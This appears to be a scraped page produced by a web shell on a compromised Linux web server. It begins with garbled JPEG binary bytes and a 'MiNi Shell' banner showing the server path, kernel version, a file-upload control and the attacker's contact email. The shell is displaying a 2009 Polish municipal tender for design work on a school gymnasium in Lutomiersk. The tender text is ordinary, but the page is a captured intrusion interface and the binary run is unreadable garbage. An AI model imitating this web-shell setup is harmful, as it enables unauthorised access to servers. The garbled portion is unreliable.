JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090409/99856-N-2009.html

<p class="kh_header"><b>Lutomiersk: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ SALI GIMNASTYCZNEJ Z ZAPLECZEM SOCJALNYM ORAZ ŁĄCZNIKA Z ISTNIEJĄCĄ
SZKOŁĄ PODSTAWOWĄ W LUTOMIERSKU</b><br>
<b>Numer ogłoszenia: 99856 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lutomiersk , Pl. Jana Pawła II 11, 95-083 Lutomiersk, woj. łódzkie, tel. 043 6775011 w. 118, faks 043 6775094.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lutomiersk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ SALI GIMNASTYCZNEJ Z ZAPLECZEM SOCJALNYM ORAZ ŁĄCZNIKA Z ISTNIEJĄCĄ
SZKOŁĄ PODSTAWOWĄ W LUTOMIERSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1)	Opracowanie kompletnej dokumentacji projektowej sali gimnastycznej z zapleczem socjalnym oraz łącznika z istniejącą Szkołą Podstawową w Lutomiersku.
2)	Przedmiotowa dokumentacja winna być opracowana w fazie dokumentacji budowlanej i wykonawczej pełnobranżowej (projekty budowlano-wykonawcze branżowe - instalacje elektryczne wraz z osprzętem, instalacji wod-kan wraz z osprzętem, instalacji gazowej, wentylacji mechanicznej i inne konieczne) wraz ze wszystkimi koniecznymi uzgodnieniami, opracowaniami i pozwoleniami, z kosztorysami inwestorskimi, przedmiarami robót i specyfikacjami technicznymi wykonania i odbioru robót na budowę sali gimnastycznej z zapleczem socjalnym (szatniowo - sanitarnym, magazynem sprzętu sportowego i pokojem nauczycieli wf) oraz łącznikiem z istniejącą szkołą podstawową z uwzględnieniem następujących założeń:
-	sala gimnastyczna o wymiarach 18,0 x 36,0 mb. Na płycie boiska winno znajdować się pełnowymiarowe boisko do piłki koszykowej i do piłki siatkowej. Należy przewidzieć możliwość podziału boiska kurtyną na dwie części.
-	zaplecze przedmiotowej sali umiejscowione od strony południowej,
-	konstrukcja sali gimnastycznej szkieletowa, jednonawowa. Dach w kształcie o przekroju łuku. Sala przystosowana do gry w piłkę siatkową i koszykową.
-	podłoga sportowa - podłoże sprężyste, wykładzina sportowa (kolor w odniesieniu do zaplanowanych boisk) na legarach drewnianych,
-	łącznik z istniejącą szkołą podstawową od strony południowej szkoły. Łącznik winien posiadać 3 kondygnacje formą nawiązujący do istniejącej szkoły podstawowej. Na parterze pomieszczenia socjalne i przejście do sali gimnastycznej, na I i II piętrze sale lekcyjne - po 2 sale na każdym piętrze. Założeniem Zamawiającego jest wykorzystanie do komunikacji klatki schodowej istniejącej szkoły podstawowej (komunikacja dla każdej kondygnacji). Łącznik winien zostać wyposażony w wymaganą przepisami prawa ilość sanitariatów.
-	Projekt będący przedmiotem niniejszego zamówienia musi przewidywać pierwsze wyposażenie zaprojektowanych pomieszczeń.
3)	Przedmiotem zamówienia jest również:
-	opracowanie koncepcji projektowanego obiektu,
-	inwentaryzacja budowlana i instalacyjna obiektów istniejących do celów projektowych,
-	uzyskanie decyzji o lokalizacji inwestycji celu publicznego ULICP oraz pozwolenia na budowę,
	-	opracowanie studium wykonalności dla projektowanego obiektu,
-	opracowanie audytu energetycznego (charakterystyka energetyczna w formie świadectwa charakterystyki energetycznej, o której mowa w art. 5 ustawy z dnia 7 lipca 1994r. Prawo Budowlane (t.j. Dz. U. z 2006r. Nr 156 poz. 1118 z późn. zm.)),
	-	projekt kolorystyki budynku
-	projekt zagospodarowania terenu wraz z infrastrukturą (parkingi - lokalizacja i ilość miejsc parkingowych zostanie określona na etapie przygotowania koncepcji), chodniki, drogi dojazdowe, zieleń, mała architektura, oświetlenie terenu itp.),
-	projekt przyłączy,
-	projekt bezodpływowego zbiornika na nieczystości płynne,
-	instrukcja bezpieczeństwa pożarowego,
-	sprawowanie nadzoru autorskiego na robotach budowlano-instalacyjnych.
4)	Dokumentacja musi uwzględniać wykonane wcześniej przez Wykonawcę badania geologiczne (odwierty mają zapewnić pełne rozeznanie uwarunkowań geologicznych dla prawidłowego fundamentowania obiektu, ilość odwiertów - w/g właściwych przepisów i norm).
5)	Wykonawca wykona wyżej wymienione dokumenty w wersji pisemnej w 5 egzemplarzach oraz 1 egz. w wersji elektronicznej w plikach PDF lub JPG w rozdzielczości umożliwiającej bezproblemowe odczytanie.
2.	Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień:
71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych,
74232000-4 - Usługi inżynieryjne w zakresie projektowania.
3.	Lokalizacja obiektu - Szkoła Podstawowa w Lutomiersku, 95-083 Lutomiersk, ul. Piłsudskiego 1. Obręb geodezyjny Wrząca, nr. działek: 280/1, 91/4, 38/2.
4.	Wykonawca przyjmując do wykonania prace określone w ust.1, obowiązany jest wykonać je ze szczególną starannością i dbałością o interesy Zamawiającego, zgodnie z normami państwowymi i obowiązującymi przepisami. Przedmiot zamówienia zostanie wykonany przez Wykonawcę zgodnie z ustawą z dnia 7 lipca 1994r. - Prawo budowlane, zgodnie z warunkami zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003r. Nr 120, poz. 1133 z późn. zm.) oraz z uwzględnieniem przepisów zawartych w ustawie z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.) i zgodnie z aktami wykonawczymi do niej - w tym w szczególności z zastosowaniem:
1)	Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.);
2)	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
Dokumentacja musi uwzględniać wszelkie uregulowania wynikające z prawa budowlanego dotyczące budynków oświatowych, przepisy BHP i ppoż., warunki techniczne, uzgodnienie dostępności dla osób niepełnosprawnych.
5.	Dodatkowe wymagania, zalecenia i uwagi inwestora:
-	Wykonany projekt winien zakładać nowoczesną i atrakcyjną przestrzennie formę architektoniczną. Jednocześnie Wykonawca opracowując dokumentację projektową winien wziąć pod uwagę, iż celem Zamawiającego jest uzyskanie możliwie najlepszego efektu za możliwie najniższe koszty. Wykonawca winien zoptymalizować koszty w stosunku do zaproponowanych rozwiązań.
-	Wykonawcy zobowiązani są przed złożeniem ofert dokonać wizji lokalnej terenu objętego zamówieniem. (Oświadczenie o dokonaniu wizji lokalnej Wykonawcy złożą na formularzu ofertowym). Celem wizji lokalnej jest szczegółowe zapoznanie się ze specyfiką i charakterem robót. Zamawiający nie będzie respektował żadnych zarzutów wynikających z nieznajomości przez Wykonawców specyfiki i charakteru robót, jeśli okoliczności te możliwe były do ustalenia przy przeprowadzonej z należytą starannością wizji lokalnej.
-	Wszelkie wymiary należy pobrać z natury.
-	Wykonawca ponosi opłaty za wszystkie uzgodnienia.
-	Wykonawca przyjmuje na siebie pełną odpowiedzialność za właściwe wykonanie prac, zapewnienie warunków bezpieczeństwa, jakość materiałów oraz metod organizacyjno-technicznych w trakcie realizacji zamówienia. Wykonawca przyjmuje na siebie pełną odpowiedzialność za ewentualne szkody lub uszkodzenia urządzeń znajdujących się na terenie objętym zamówieniem powstałe w wyniku prowadzonych przez Wykonawcę prac a także za ewentualne szkody poniesione w związku z prowadzonymi pracami przez pracowników Wykonawcy i osoby trzecie.1
-	W przypadku stwierdzenia braków lub błędów w dokumentacji projektowej stwierdzonych na etapie przetargu na wykonanie roboty budowlanej, której projekt dotyczy, Wykonawca dokumentacji projektowej zobowiązany jest do natychmiastowego nieodpłatnego usunięcia wad lub uzupełnienia braków a także do niezwłocznego nieodpłatnego udzielenia wyjaśnień i odpowiedzi na pytania Wykonawców roboty budowlanej.
-	Dokumentacja, o której mowa w niniejszym rozdziale nie może wskazywać znaków towarowych, patentów lub pochodzenia materiałów służących do wykonania roboty budowlanej, której dokumentacja projektowa dotyczy - zgodnie z art. 29 ustawy Prawo zamówień publicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W przetargu mogą wziąć udział wykonawcy, którzy udokumentują przez złożenie stosownych dokumentów i oświadczeń, że spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Opis warunków udziału w postępowaniu:
1)	wykonawca jest uprawniony do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi, wykonawca posiada wpis do właściwego rejestru lub wpis do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej a przedmiot zamówienia wchodzi w jego działalność;
2)	wykonawca posiada wiedzę i doświadczenie w wykonywaniu prac jak w niniejszym zamówieniu - tj. Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 3 usługi odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia a także dysponuje odpowiednim sprzętem i osobami posiadającymi uprawnienia do projektowania w zakresie niezbędnym do wykonania przedmiotu zamówienia będącymi członkami Okręgowej Izby Inżynierów Budownictwa.
Przez usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia Zamawiający rozumie to, że Wykonawca wykonał co najmniej 3 projekty architektoniczno - budowlane dla budynków użyteczności publicznej o zbliżonym przeznaczeniu, w tym o zakresie zamówienia nie mniejszym niż składana oferta zaakceptowane przez nadzór budowlany a zamawiające je podmioty otrzymały pozwolenie na budowę projektowanych obiektów;
3)	wykonawca jest w sytuacji ekonomicznej i finansowej pozwalającej mu wykonać zamówienie przyjmując warunki płatności określone w rozdziale XVI niniejszej siwz oraz wykonawca jest ubezpieczony od odpowiedzialności cywilnej w ramach prowadzonej działalności na kwotę nie mniejszą niż cena (brutto) złożonej oferty;
4)	wykonawca nie podlega wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie art. 24 ust. 1 oraz ust. 2 ustawy Prawo zamówień publicznych - tzn. nie dotyczy go żadna przesłanka wymieniona w w/w przepisie .
3.	Ocena spełnienia warunków udziału w postępowaniu, będzie dokonana na podstawie złożonych dokumentów.
4.	Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale IV niniejszej SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w warunki Wykonawca spełnia.
5.	Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert, tylko i wyłącznie na podstawie art. 26 ust. 3 ustawy Prawo zamówień publicznych.
6.	Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zgodnie z art. 44 ustawy Prawo zamówień publicznych Wykonawca zobowiązany jest złożyć oświadczenie że spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 - 4 ustawy Prawo zamówień publicznych.
1.	W celu potwierdzenia spełnienia warunku o którym mowa w rozdziale V ust. 1 pkt 1 niniejszej specyfikacji, oferta musi zawierać następujące dokumenty:
1)	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
2)	umowę regulującą współpracę podmiotów występujących wspólnie - jeśli podmioty występują wspólnie,
3)	upoważnienie do podpisywania oferty, o ile nie wynika ono z innych dokumentów załączonych do niej.
2.	W celu potwierdzenia spełnienia warunku o którym mowa w rozdziale V ust. 1 pkt 2 niniejszej specyfikacji, oferta musi zawierać następujące dokumenty:
1)	Wykaz wykonanych w okresie ostatnich 3 lat co najmniej 3 projektów architektoniczno - budowlanych dla budynków użyteczności publicznej o zbliżonym przeznaczeniu, w tym  o zakresie zamówienia nie mniejszym niż składana oferta; a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie , z podaniem przedmiotu, dat  wykonania  i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie. (załącznik nr 5)
(Z wykazu musi wynikać, że wykonawca w w/w okresie wykonała co najmniej 3 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Przez ten sam rodzaj usług zamawiający rozumie usługi projektowe sal gimnastycznych (sportowych) o podobnych rozmiarach i konstrukcji wraz z zapleczem. Projektowane obiekty zaakceptowane zostały przez nadzór budowlany a zamawiające je podmioty otrzymały pozwolenie na budowę projektowanych obiektów.)
Do wykazu, o którym mowa powyżej należy dołączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie (należy załączyć referencje zamawiających).
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; albo pisemne zobowiązani innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osoby, którymi będzie dysponował.
	stwierdzający, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
	(Kserokopie niezbędnych uprawnień zawodowych i dokumentów potwierdzających przynależność do właściwej Izby Samorządu Zawodowego projektantów i sprawdzających wg wymaganych branż).
3.	W celu potwierdzenia spełnienia warunku o którym mowa w rozdziale V ust. 1 pkt 3 niniejszej specyfikacji, oferta musi zawierać następujące dokumenty:
1)	polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie niższą niż cena (brutto) zawarta w ofercie.
4.	W celu potwierdzenia spełnienia warunku o którym mowa w rozdziale V ust. 1 pkt 4 niniejszej specyfikacji, oferta musi zawierać następujące dokumenty:
1)	pisemne oświadczenie wykonawcy, że spełnia on warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych - w tym, że nie podlega wykluczeniu z postępowania o zamówienie publiczne z przyczyn określonych art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych, złożone na wzorze stanowiącym Załącznik nr 2 do specyfikacji (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
5.	Wszystkie dokumenty składane przez wykonawców wymagają formy pisemnej, muszą być złożone w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez prawnych przedstawicieli wykonawcy.
6.	Potencjalni oferenci z innych państw członkowskich Unii Europejskiej mogą składać dokumenty równoważne, odpowiadające polskim dokumentom wymaganym przez Zamawiającego. W przypadku załączenia jakichkolwiek dokumentów w językach obcych, niezbędne jest dołączenie ich tłumaczenia na język polski przez tłumacza przysięgłego.
7.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605 z późn. zm.), składa dokument wskazane w tym rozporządzeniu w §2.
8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 1, ust 3 cyt. Rozporządzenia - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lutomiersk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lutomiersk
Pl. Jana Pawła II 11
95-083 Lutomiersk
pok. 18.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 09:50, miejsce: Oferty należy złożyć w siedzibie zamawiającego tj. w Urzędzie Gminy Lutomiersk, Pl. Jana Pawła II 11, 95-083 Lutomiersk, pok. nr 17 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com